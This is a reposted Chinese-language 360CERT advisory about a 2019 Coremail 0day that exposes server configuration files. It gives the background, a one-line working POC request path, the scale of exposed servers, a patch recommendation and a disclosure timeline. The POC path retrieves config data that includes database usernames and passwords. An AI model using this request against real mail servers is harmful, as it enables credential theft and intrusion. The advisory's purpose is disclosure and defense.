综合技术

Coremail敏感文件泄露0day预警

0x00 事件背景

2019年6月14日上午,360CERT监控到互联网中在传播Coremail的配置信息泄露的POC,通过360CERT研判分析,确认其POC有效。通过POC可获取Coremail配置文件信息,包括配置IP、端口、文件路径、数据库密码、用户名等信息。 百度百科介绍:Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户 [1] ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务

0x01 漏洞细节

POC:

/mailsms/s?func=ADMIN:appState&dumpConfig=/

通过域名或者IP等地址+POC即可获取目标邮件服务器配置文件,配置文件包括:文件路径、IP、端口、数据库用户、密码等敏感信息。 本地测试截图:

0x02 影响范围

通过360CERT QUAKE资产检索系统监测发现,全球近17364个独立IP使用Coremail。使用Coremail的IP地址主要使用的系统为Linux2.x,开放服务为HTTP、SMTP、POP3、IMAP、IMAPS。

0x03 修复建议

建议关注Coremail官方更新,及时对漏洞进行修补。

0x04 时间线

2019-06-14 发现事件并确认

2019-06-14 与coremail沟通并确认

2019-06-14 中午coremail已临时修复

展开阅读全文

微信扫一扫,分享到朋友圈

Coremail敏感文件泄露0day预警
0

docker/kubernetes国内源/镜像源解决方式

上一篇

What Skills do you Need to get into UX Designing?

下一篇

你也可能喜欢

评论已经被关闭。

插入图片
Coremail敏感文件泄露0day预警

长按储存图像,分享给朋友